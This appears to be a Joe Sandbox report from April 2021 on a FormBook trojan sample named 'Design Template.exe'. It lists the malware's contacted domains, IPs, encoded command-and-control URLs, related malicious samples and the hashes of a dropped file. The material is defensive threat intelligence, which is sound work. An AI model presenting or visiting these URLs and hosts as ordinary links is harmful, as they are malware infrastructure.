        http://www.sexichef.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== | 0% | Avira URL Cloud | safe
        http://www.carterandcone.coml | 0% | URL Reputation | safe
        http://www.sajatypeworks.com | 0% | URL Reputation | safe
        http://www.typography.netD | 0% | URL Reputation | safe
        http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
        http://www.landreclaim.com/ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx | 0% | Avira URL Cloud | safe
        http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
        http://fontfabrik.com | 0% | URL Reputation | safe
        http://www.founder.com.cn/cn | 0% | URL Reputation | safe
        www.zq2003.com/ma3c/ | 0% | Avira URL Cloud | safe
        http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
        http://www.sci-mfg.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== | 0% | Avira URL Cloud | safe
        http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
        http://www.betralifcannabis.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== | 0% | Avira URL Cloud | safe
        http://www.sandoll.co.kr | 0% | URL Reputation | safe
        http://www.chuanyangwenhua.com/ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx | 0% | Avira URL Cloud | safe
        http://www.urwpp.deDPlease | 0% | URL Reputation | safe
        http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
        http://www.2elden.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== | 0% | Avira URL Cloud | safe
        http://www.sakkal.com | 0% | URL Reputation | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        gz01.bch.baidu-itm.com | 14.215.190.65 | true | true | - | unknown
        yashasvsaluja.com | 192.0.78.25 | true | true | - | unknown
        bestflowersandgifts.com | 34.102.136.180 | true | false | - | unknown
        www.realunitystudio.com | 204.11.56.48 | true | true | - | unknown
        www.zq2003.com | 47.105.113.141 | true | true | - | unknown
        rememberingedward.info | 160.153.136.3 | true | true | - | unknown
        www.landreclaim.com | 198.50.252.64 | true | true | - | unknown
        sexichef.com | 34.102.136.180 | true | false | - | unknown
        sci-mfg.com | 34.102.136.180 | true | false | - | unknown
        betralifcannabis.com | 34.102.136.180 | true | false | - | unknown
        www.2elden.com | 156.226.160.56 | true | true | - | unknown
        www.gxjljc.com | unknown | unknown | true | - | unknown
        www.betralifcannabis.com | unknown | unknown | true | - | unknown
        www.mirgran.com | unknown | unknown | true | - | unknown
        www.modomo.amsterdam | unknown | unknown | true | - | unknown
        www.bestflowersandgifts.com | unknown | unknown | true | - | unknown
        www.sexichef.com | unknown | unknown | true | - | unknown
        www.yashasvsaluja.com | unknown | unknown | true | - | unknown
        www.rememberingedward.info | unknown | unknown | true | - | unknown
        www.sci-mfg.com | unknown | unknown | true | - | unknown
        www.chuanyangwenhua.com | unknown | unknown | true | - | unknown

                                            Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://www.zq2003.com/ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx | true | Avira URL Cloud: safe | unknown
        http://www.rememberingedward.info/ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== | true | Avira URL Cloud: safe | unknown
        http://www.bestflowersandgifts.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== | false | Avira URL Cloud: safe | unknown
        http://www.sexichef.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== | false | Avira URL Cloud: safe | unknown
        http://www.landreclaim.com/ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx | true | Avira URL Cloud: safe | unknown
        www.zq2003.com/ma3c/ | true | Avira URL Cloud: safe | low
        http://www.sci-mfg.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== | false | Avira URL Cloud: safe | unknown
        http://www.betralifcannabis.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== | false | Avira URL Cloud: safe | unknown
        http://www.chuanyangwenhua.com/ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx | true | Avira URL Cloud: safe | unknown
        http://www.2elden.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== | true | Avira URL Cloud: safe | unknown

                                            URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://www.autoitscript.com/autoit3/J | explorer.exe, 00000007.00000000.298632353.0000000006870000.00000004.00000001.sdmp | false | - | high
        http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | - | high
        http://www.fontbureau.com | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | - | high
        http://www.fontbureau.com/designersG | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | - | high
        http://schemas.mi | explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://www.fontbureau.com/designers/? | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | - | high
        https://twitter.com/onlydomains | rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp | false | - | high
        http://www.founder.com.cn/cn/bThe | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp | false | - | high
        http://www.fontbureau.com/designers? | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | - | high
        https://www.onlydomains.com/hosting/?utm_medium=free_parking&utm_source=landreclaim.com | rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp | false | - | high
        http://www.tiro.com | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        https://www.onlydomains.com?utm_medium=free_parking&utm_source=landreclaim.com | rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp | false | - | high
        http://www.fontbureau.com/designers | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | - | high
        http://www.goodfont.co.kr | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        http://schemas.micr | explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        http://www.carterandcone.coml | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        http://www.sajatypeworks.com | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        http://www.typography.netD | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | - | high
        http://www.founder.com.cn/cn/cThe | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
        http://fontfabrik.com | explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                                                                    http://www.founder.com.cn/cnexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.cssrundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        https://www.trustpilot.com/review/onlydomains.comrundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.fontbureau.com/designers8explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.fonts.comexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.sandoll.co.krexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.urwpp.deDPleaseexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.zhongyicts.com.cnexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.sakkal.comexplorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.50.252.64 | www.landreclaim.com | Canada | 16276 | OVHFR | true
160.153.136.3 | rememberingedward.info | United States | 21501 | GODADDY-AMSDE | true
34.102.136.180 | bestflowersandgifts.com | United States | 15169 | GOOGLEUS | false
156.226.160.56 | www.2elden.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | true
47.105.113.141 | www.zq2003.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
14.215.190.65 | gz01.bch.baidu-itm.com | China | 58466 | CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCN | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385453
Start date: 12.04.2021
Start time: 14:40:34
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 27s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Design Template.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.evad.winEXE@7/1@15/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 62.8% (good quality ratio 54.5%)
• Quality average: 71.8%
• Quality standard deviation: 33.5%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 76
• Number of non-executed functions: 109
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.50.102.62, 52.147.198.201, 184.30.24.56, 92.122.145.220, 104.43.193.48, 2.20.142.210, 2.20.142.209, 20.82.210.154, 52.255.188.83, 92.122.213.247, 92.122.213.194, 20.54.26.129, 52.155.217.156, 13.88.21.125, 104.42.151.234
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www.buscar-id-apple.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match: 198.50.252.64
Associated Sample Name / URL | Detection | Context
Shipping Doc.exe | malicious | www.bintangcorp.com/sqe3/?r6=82DAHq2wg3tuo2XqCLLZJ41l7RS7yClHFVO3uI9CUY5+zT+6pv+aC+43mynQrH4pKWI8iWHnVQ==&rZvLVf=YL0hPBuh3Bh8NfMP
TEC20201601.exe | malicious | www.melbournemedicalhealth.net/m8ec/?VPXh=GdPH&MvZ0HjY=ilbnhHVsbLcSqSBJLKZotjdD4qCqiNhav+gd5mGUy/YGPx1v2HXvdJB9yyxpl/8QwS96
PI DX190530.exe | malicious | www.artemisplastic.com/g2t/?Hp=Y4KDuNph&YP=t66oSzNKtGU0CMBolCrZoHIrgB5Pfu02DUYCDcIwLLM2jCY8ClAW1PeZ3EO9e0zCGeJn

Match: 160.153.136.3
Associated Sample Name / URL | Detection | Context
sgJRcWvnkP.exe | malicious | www.angelique-yoga.com/svh9/?EZA4iv=3+1keiJQeiCfSFf0lryhDdo9oQ7ZhWftUl7g93orCRsqpmVaeyk3iGEIaA5mjzn0PnfUEO9yMg==&GzuLH=VBZtT83HH6GhB4
jEXf5uQ3DE.exe | malicious | www.redfiendpub.com/a6ru/?vRiX0=SOUS22xX9sTup/qaoB5MIRVPJCAYfdfKxkVl7wOCwv/faooOqTtneRL78hEWE1sF48OexjQHLg==&OhNl7=9rXdXRPXHBu
Sales Invoice NO CN 6739.exe | malicious | www.motherhenscoop.com/chue/?EzutZl=3fX08rZHUH-&EhA8R=FB66DOuroI4CmOxq6a67IaKWBfukXdwRgdwsxf3jwhQX0Agp8EFRmiJ/Ub3Lswqn57xy
PO-RFQ # 097663899.exe | malicious | www.bigbuddyco.com/uabu/?_hrPK=2Uwp0g01JmizGb12EcJoawpAPddW8uWsqbAJ1/nDEFeqLH5icC3QCg1YL+W/1Y8NxrPm&o0D=jL0LdZHh34d0ut
LWlcpDjYIQ.exe | malicious | www.karizcustomizeme.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy
PO#41000055885.exe | malicious | www.fastreliablemovers.com/s2oc/?8pDp00Hp=uy54us4ylpnOfyY6whDYihgyZC0Esknxq0Vw7fJMOJ1uVM8FmT+LYp8/ndiOcopYLTgN&GzrL=WBjT_rUpa
Quotation.zip.exe | malicious | www.customkreation.com/md5/?sZODfJ=SSaZr77bX+wOOkDQuPSRIEdkxTkeMUTiYzthw7Z1sXt2p1dwJW8/E+4NRWcqo2nKYqvGVVcT4Q==&IzrxUP=XFQdnvQx-jxL
PaymentInvoice.exe | malicious | www.thetrentproject.com/c22b/?9rgH70GX=3hZc8uDQNF2XjKqAM81yXveUJ3HYXQDb4GKg5u/1+rchdnCquZS07L8bvaz6arZeztnq&LL0=X4XDHNl0z
ORIGINAL SHIPPING DOCUMENTSPDF.exe | malicious | www.craftgrowfarms.com/qqeq/?D8IxB=7nSpJtUpafTlT6&eb=/IDxx24Axl4cbD5+EJQNaXvnYIhuFpcrqBwxsI56nktuMkyspMBINcRo1NfHRhPmyuWswdOuHA==
PaymentInvoice.exe | malicious | www.thetrentproject.com/c22b/?k6A0=3hZc8uDQNF2XjKqAM81yXveUJ3HYXQDb4GKg5u/1+rchdnCquZS07L8bvZfqGaFl0YO7P8W0gg==&Jhk=xN90gjnxaL
Inquiry.docx | malicious | www.warriormovers.com/qjnt/?s89=ZloBTponoX02e5gi3FYIj/PbKl44EdMQG0QlJcdkzx7vf5IbO8FhxdmCpjSPDQLZlRTi4A==&EL3=YXgtZbMH9Rj4xv
Quotation.zip.exe | malicious | www.customkreation.com/md5/?8pgpa6=SSaZr77bX+wOOkDQuPSRIEdkxTkeMUTiYzthw7Z1sXt2p1dwJW8/E+4NRVwDr2byRJaQ&ATR8IR=eT8xexNprnm8u4U
Paymonth invoice.exe | malicious | www.thirtytwohockey.com/tocg/?tZU0=d7p5RRREXQmDvUtPiIE4OQw74/HHtYHGT70rEjBzkCsmmafMBTybf7Sha+o3Gl2gVsKZGoTuww==&Upqh=GTdPsn7Pe8SXkPQ
PO_RFQ007899_PDF.exe | malicious | www.midnight-tribe.com/zgg6/?N2=u1vejHrzkkLu5b9V7XB400V330Lc8uew1eeDf/KdhWioLwkIxbYF1D95wcluNAi8eFtW&i4=Ppcd
Swift001_jpg.exe | malicious | www.newhopepropertysolutions.net/o9st/?KtClV=EA73qnsRXV8UgRhgNdmHym3gCvqtNllDE4wN3e9I7i7SCCwYnWBC3XhiPIw2HUhj6xVd&t8rL=FrghEXS
SWIFT001_jpg.exe | malicious | www.strategyplace.net/c8bs/?GR-8=Y+kvwDHuPs7d2r/xKL7WgaF8PTUWzGtrumOK1HlhuDcsPQWFrXK3haHxa/T6IUnTGo5pqWk2VA==&DZX45L=zZEdNNm87dpx
COAU7229898130.xlsx | malicious | www.treasureislandhunt.com/jzvu/?oP0tUN_=NzgAMwieRov+nxxgtDwKqk7zMisDg84XFY9auB03daZMDlDJBtB3rw2hqcc+lbtXE5ZF0w==&cf=4h-hmDNHNl6hA4
BIOTECHPO960488580.exe | malicious | www.davidkellywvhouse6.com/mb7q/?KneXF=OfKUnzPetndZQa7DVTEEDENIE4WmkhK+wSkJS9mdqBclGOhIlD09Pr9FnBmdL38oD9am&pPB=K2MDkxRXyRbTZrrp
Product list.xlsx | malicious | www.jedinomad.net/vu9b/?-ZltiVX8=ZVXBbfE+XbBh+xPAjEgNF7xgaCIHrLxMQl0hA28H7lZcPnDTQwmNEoEjTBG5DlxBNzP22A==&RfR4I=JR-06F20O6g
OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exe | malicious | www.urfa-3.com/smzu/?D8cH=9r8tQzN8o24l6vY&sXUlfNy=2U89zO+VsmCZrKU9N+kvNT/Ei3oyx6cSiogMuCj+NMq1RoKapv70MYEUrKuaMhd7MLO+

Domains

Match: gz01.bch.baidu-itm.com
Associated Sample Name / URL | Detection | Context
Requirement of Sonic Tube 50 mm.exe | malicious | 14.215.190.65
sample catalog_copy.exe | malicious | 14.215.190.65
dGWioTejLEz0eVM.exe | malicious | 14.215.190.65
1bTpgGVn5mfDSUq.exe | malicious | 14.215.190.65
9tyZf93qRdNHfVw.exe | malicious | 14.215.190.65
Confirm!!.exe | malicious | 14.215.190.65
Confirm.exe | malicious | 14.215.190.65
http://ncxps.com/wp-includes/rRRv7ILGM2dzPohaKlKheWb8rkju15bMqeEWcCglAp/ | malicious | 150.138.249.207
order.exe.exe | malicious | 150.138.249.207
https://j.mp/2xHfFPy | malicious | 150.138.249.207
https://clck.ru/MsKX5 | malicious | 150.138.249.207
http://tiny.cc/y77jmz | malicious | 150.138.249.207
http://tiny.cc/19i2lz | malicious | 150.138.249.207
http://www.liaoweiling.top/wp-includes/Documentation/deasjcj1-790300-5683-nyu2lidkpk-4wzto/ | malicious | 150.138.249.209
15Ottawa Officework - PO # OTT10590 ( Cape # 20180007) .pdf.exe | malicious | 150.138.249.206

ASN

Match: XIAOZHIYUN1-AS-APICIDCNETWORKUS
Associated Sample Name / URL | Detection | Context
Ref. PDF IGAPO17493.exe | malicious | 164.155.20.27
Betaling_advies.exe | malicious | 156.241.53.253
pumYguna1i.exe | malicious | 156.241.53.161
gqnTRCdv5u.exe | malicious | 156.255.140.216
eQLPRPErea.exe | malicious | 156.254.221.72
PO#41000055885.exe | malicious | 156.241.53.51
Quotation.zip.exe | malicious | 103.48.133.161
PURCHASE ORDER.exe | malicious | 156.241.53.167
RFQ11_ZIM2021pdf.exe | malicious | 156.253.112.252
PO2103019BGT.exe | malicious | 156.241.53.167
OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exe | malicious | 164.155.20.209
New Month.exe | malicious | 156.254.178.16
proforma.exe | malicious | 156.225.32.63
bank details.exe | malicious | 164.155.20.27
BL Draft copy.exe | malicious | 154.207.58.215
JRTpdf.exe | malicious | 156.253.112.252
invoice bank.xlsx | malicious | 156.254.221.72
Factura proforma, pedido nuevo.exe | malicious | 154.222.72.30
Q1VDYnqeBX.exe | malicious | 156.241.53.161
Gt8AN6GiOD.exe | malicious | 156.241.53.161

Match: GODADDY-AMSDE
Associated Sample Name / URL | Detection | Context
sgJRcWvnkP.exe | malicious | 160.153.136.3
winlog.exe | malicious | 160.153.137.170
jEXf5uQ3DE.exe | malicious | 160.153.136.3
CNTR-NO-GLDU7267089.xlsx | malicious | 160.153.129.38
Sales Invoice NO CN 6739.exe | malicious | 160.153.136.3
PO-RFQ # 097663899.exe | malicious | 160.153.136.3
LWlcpDjYIQ.exe | malicious |
                                                                              • 160.153.136.3
                                                                              gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                              • 160.153.137.40
                                                                              PO#41000055885.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Quotation.zip.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Remittance Advice-Advance Payment.exeGet hashmaliciousBrowse
                                                                              • 160.153.143.222
                                                                              RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                              • 160.153.137.170
                                                                              PaymentInvoice.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              PaymentInvoice.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Inquiry.docxGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Quotation.zip.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              Paymonth invoice.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                                                              • 160.153.136.3
                                                                              TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                              • 160.153.137.170
                                                                              OVHFRVJNPltkyHyI3CCo.exeGet hashmaliciousBrowse
                                                                              • 66.70.204.222
                                                                              SecuriteInfo.com.Trojan.MinerNET.8.21400.exeGet hashmaliciousBrowse
                                                                              • 51.255.34.118
                                                                              Anmodning om tilbud 12-04-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                              • 167.114.6.31
                                                                              Swift copy.pdf.exeGet hashmaliciousBrowse
                                                                              • 51.222.80.112
                                                                              PO-4147074_pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              kQVi54bTM0.exeGet hashmaliciousBrowse
                                                                              • 5.196.102.93
                                                                              cym4u.exeGet hashmaliciousBrowse
                                                                              • 188.165.17.91
                                                                              Statement-ID-(400603).vbsGet hashmaliciousBrowse
                                                                              • 51.89.204.5
                                                                              $108,459.00.htmlGet hashmaliciousBrowse
                                                                              • 146.59.152.166
                                                                              LtfVNumoON.exeGet hashmaliciousBrowse
                                                                              • 144.217.30.204
                                                                              giATspz5dw.exeGet hashmaliciousBrowse
                                                                              • 142.4.204.181
                                                                              SecuriteInfo.com.__vbaHresultCheckObj.21994.exeGet hashmaliciousBrowse
                                                                              • 149.202.83.171
                                                                              SecuriteInfo.com.Variant.Johnnie.321295.17359.exeGet hashmaliciousBrowse
                                                                              • 91.121.140.167
                                                                              fileshare.docGet hashmaliciousBrowse
                                                                              • 188.165.245.148
                                                                              SecuriteInfo.com.Variant.Bulz.421173.18141.exeGet hashmaliciousBrowse
                                                                              • 51.89.77.2
                                                                              R1210322PIR-2FQUOTATION(P21C00285).exeGet hashmaliciousBrowse
                                                                              • 51.38.214.75
                                                                              Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              Notice of change schedule for CID_ CMA CGM AMBER 0QA8FS1NC 0QA8GN1NC - 1st Rev.pdf_1.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221
                                                                              Purchase Order No.10056.exeGet hashmaliciousBrowse
                                                                              • 51.195.53.221

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Liebert.bmp
Process: C:\Users\user\Desktop\Design Template.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: modified
Size (bytes): 164864
Entropy (8bit): 7.209205710925533
Encrypted: false
SSDEEP: 3072:CB/2vWJU7SV/DPHojgdtuxB5ukO99VUY7ls0RmunNWOne:qCqfojIg751O99VUenIunEO
MD5: 5CE9A1DC2873C419D9F42B71EB3B15EA
SHA1: C6FE65A2BCD683AD3B07458F382BFD14A24B4E8F
SHA-256: FEE88005A72B0DEC13B45092E47B5275498E26BECA1FAE2193AB89E48E689C09
SHA-512: 68FE533EBB15DB0B4AF7F27733D77652825C0D68E5567536D307C47002514C821DE0D13E3774EB3CEB70E24CC02E747926919C90F6A56A2357761174A84D558B
Malicious: true
Yara Hits:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, Author: JPCERT/CC Incident Response Group
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
